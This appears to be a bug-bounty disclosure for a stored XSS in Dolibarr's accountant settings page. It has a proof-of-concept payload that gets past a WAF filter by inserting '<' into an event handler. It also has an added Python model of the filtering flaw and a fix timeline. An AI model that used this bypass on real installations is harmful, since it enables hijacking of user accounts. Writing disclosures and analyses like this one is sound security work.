A stored XSS in dolibarr/htdocs/admin/accountant.php in dolibarr/dolibarr

Valid

Reported on

Jun 12th 2022


Description

I found a stored XSS in admin/accountant.php: the fields town, name and Accountant code can escape the double quote. The path 'dolibarr/htdocs/main.inc.php' has a WAF, so we cannot inject any JavaScript onxxx event handler. However, in the path dolibarr/htdocs/core/lib/functions.lib.php (line 6643) there is a statement:

$temp = preg_replace('/<+([a-z]+)/i', '\1', $temp);

We can use it to bypass the WAF by adding a < in the payload.

Proof of Concept

POST /dolibarr/htdocs/admin/accountant.php HTTP/1.1
...
...&town="on<click=alert(/xss/);"
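The following Python example is added here and is not code from the report or from Dolibarr. It models the ordering problem the description points at: a simplified block-list check (an assumption standing in for the real main.inc.php filter) inspects the raw request value, but the preg_replace quoted from functions.lib.php later collapses on<click into onclick, so the stored value is not the one that was checked. It also shows that attribute-context output encoding neutralises the stored string regardless of what the input filter does.

```python
import html
import re

# Simplified stand-in for a block-list input filter that rejects inline event
# handlers. Assumption: this is NOT Dolibarr's real main.inc.php logic, only a
# minimal model of a filter that runs on the raw request value.
EVENT_HANDLER = re.compile(r'on[a-z]+\s*=', re.IGNORECASE)

# Python form of the statement quoted from functions.lib.php:
#   preg_replace('/<+([a-z]+)/i', '\1', $temp)
# Every run of '<' directly followed by letters is collapsed to the letters.
STRIP_LT = re.compile(r'<+([a-z]+)', re.IGNORECASE)


def filter_allows(raw: str) -> bool:
    """Block-list check on the raw value exactly as submitted."""
    return EVENT_HANDLER.search(raw) is None


def normalise(raw: str) -> str:
    """The later sanitising step; it rewrites the value after the filter ran."""
    return STRIP_LT.sub(r'\1', raw)


def store_vulnerable(raw: str):
    """Filter first, normalise second: what gets stored differs from what was checked."""
    return normalise(raw) if filter_allows(raw) else None


def render_unencoded(stored: str) -> str:
    """Stored value emitted into a double-quoted attribute as-is."""
    return f'<input value="{stored}">'


def render_encoded(stored: str) -> str:
    """Same emission with attribute-context encoding (htmlspecialchars/ENT_QUOTES equivalent)."""
    return f'<input value="{html.escape(stored, quote=True)}">'


def attribute_intact(markup: str) -> bool:
    """Detection helper: only the two wrapping quotes may remain raw in the markup."""
    return markup.count('"') == 2


# Constructed sample: the payload from the report's proof of concept.
PAYLOAD = '"on<click=alert(/xss/);"'

if __name__ == "__main__":
    stored = store_vulnerable(PAYLOAD)
    print("filter passed:", stored is not None, "| stored:", stored)
    print("unencoded intact:", attribute_intact(render_unencoded(stored)))
    print("encoded intact:  ", attribute_intact(render_encoded(stored)))
```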

The PoC Video

Impact

This vulnerability has the potential to deface websites, result in compromised user accounts, and can run malicious code on web pages, which can lead to a compromise of the user’s device.

Timeline

a year ago: We are processing your report and will contact the dolibarr team within 24 hours.
a year ago: i0hex modified the report
a year ago: We have contacted a member of the dolibarr team and are waiting to hear back
a year ago: i0hex modified the report
a year ago: Laurent Destailleur validated this vulnerability
i0hex has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
a year ago: Laurent Destailleur marked this as fixed in 16.0 with commit 2b5b99
Laurent Destailleur has been awarded the fix bounty
This vulnerability will not receive a CVE